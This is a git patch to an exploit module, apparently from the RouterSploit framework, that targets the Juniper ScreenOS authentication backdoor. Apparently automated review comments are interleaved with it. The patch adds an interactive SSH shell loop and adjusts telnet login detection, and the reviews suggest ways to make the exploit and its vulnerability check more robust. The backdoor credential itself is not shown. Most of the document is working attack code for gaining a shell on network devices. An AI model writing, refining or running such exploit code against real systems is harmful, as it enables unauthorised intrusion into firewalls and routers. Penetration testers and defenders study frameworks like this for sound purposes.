From a098d4c5c6238a3fdf8d69b4f87ae323883d043d Mon Sep 17 00:00:00 2001
From: lucyoa
Date: Mon, 9 May 2016 14:34:32 +0100
Subject: [PATCH] Juniper ScreenOS backdoor exploit fix.
---
 .../exploits/juniper/screenos_backdoor.py | 48 +++++++++++++++----
 1 file changed, 39 insertions(+), 9 deletions(-)
diff --git a/routersploit/modules/exploits/juniper/screenos_backdoor.py b/routersploit/modules/exploits/juniper/screenos_backdoor.py
index 12b376c4a..3a3ceba23 100644
--- a/routersploit/modules/exploits/juniper/screenos_backdoor.py
+++ b/routersploit/modules/exploits/juniper/screenos_backdoor.py
@@ -1,5 +1,5 @@
-import paramiko
 import telnetlib
+import paramiko, StringIO, termios, tty, sys, select, socket
 from routersploit import (
 exploits,
@@ -45,22 +45,51 @@ def run(self):
 else:
 print_success("SSH - Successful authentication")
- cmd = ""
- while cmd not in ["quit", "exit"]:
- cmd = raw_input("> ")
- stdin, stdout, stderr = ssh.exec_command(cmd.strip())
- print stdout.channel.recv(2048)
- return
+ chan = ssh.invoke_shell()
+ oldtty = termios.tcgetattr(sys.stdin)
+ try:
+ tty.setraw(sys.stdin.fileno())
+ tty.setcbreak(sys.stdin.fileno())
+ chan.settimeout(0.0)
+
+ while(True):
+ r, w, e = select.select([chan, sys.stdin], [], [])
+ if(chan in r):
+ try:
+ x = unicode(chan.recv(1024))
+
+ if(len(x) == 0):
+ sys.stdout.write('\r\nExiting...\r\n')
+ break
+
+ sys.stdout.write(x)
+ sys.stdout.flush()
+
+ except socket.timeout:
+ pass
+
+ if(sys.stdin in r):
+ x = sys.stdin.read(1)
+
+ if(len(x) == 0):
+ break
+
+ chan.send(x)
+
+ finally:
+ termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
+ return
 try:
 tn = telnetlib.Telnet(self.target, 23)
+ tn.write("\r\n")
 tn.expect(["Login: ", "login: "], 5)
 tn.write(self.username + "\r\n")
 tn.expect(["Password: ", "password"], 5)
 tn.write(self.password + "\r\n")
 tn.write("\r\n")
- (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
+ (i, obj, res) = tn.expect(["Failed", "failed"], 5)
 if i != -1:
 return False
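Review bot: The new import line loads `termios` and `tty` at module scope, and both exist only on POSIX systems, so on any other platform this module would fail at import time rather than when the interactive shell is actually reached. `StringIO` is not used in any hunk visible here and can probably be dropped. Consider importing `termios` and `tty` inside `run()` just before `ssh.invoke_shell()`, and listing the remaining modules one per line (`import select`, `import socket`, `import sys`) as PEP 8 asks. The rest of the file is outside this patch view, so confirm `StringIO` has no other user before removing it.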
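Review bot: `x = unicode(chan.recv(1024))` decodes with Python 2's default ASCII codec, so the first non-ASCII byte the device sends raises UnicodeDecodeError; the inner handler catches only `socket.timeout`, so the session ends and the exception leaves the visible `try`/`finally`. Passing the bytes through unchanged (`x = chan.recv(1024)`) or decoding tolerantly (`chan.recv(1024).decode('utf-8', 'replace')`) avoids that. The `finally` block restores only the terminal settings; neither `chan` nor `ssh` is closed on this path, so `chan.close()` and `ssh.close()` belong next to `termios.tcsetattr(...)`. `run()` starts before this hunk and continues after it, so whether a caller closes the client later cannot be seen from here.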
@@ -88,13 +117,14 @@ def check(self):
 try:
 tn = telnetlib.Telnet(self.target, 23)
+ tn.write("\r\n")
 tn.expect(["Login: ", "login: "], 5)
 tn.write(self.username + "\r\n")
 tn.expect(["Password: ", "password"], 5)
 tn.write(self.password + "\r\n")
 tn.write("\r\n")
- (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
+ (i, obj, res) = tn.expect(["Failed", "failed"], 5)
 tn.close()
 if i != -1:
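Review bot: The telnet result is inferred from the absence of a failure string: `tn.expect(["Failed", "failed"], 5)` yields `i == -1` both when the login worked and when the device printed nothing matching within five seconds, so `check()` presumably reports a slow, silent or differently worded device as affected. The change also drops the old `Incorrect` pattern, so firmware that still answers with that wording would now pass; keeping both (`["Failed", "failed", "Incorrect", "incorrect"]`) and also requiring a positive marker such as the post-login prompt would make the verdict reliable for anyone auditing their own devices. The return values of the two earlier `tn.expect(...)` calls are ignored, so a host that never shows a login prompt is not told apart either. The same pattern change is made in the telnet part of `run()` in the previous hunk; `check()` starts before this hunk and continues after it.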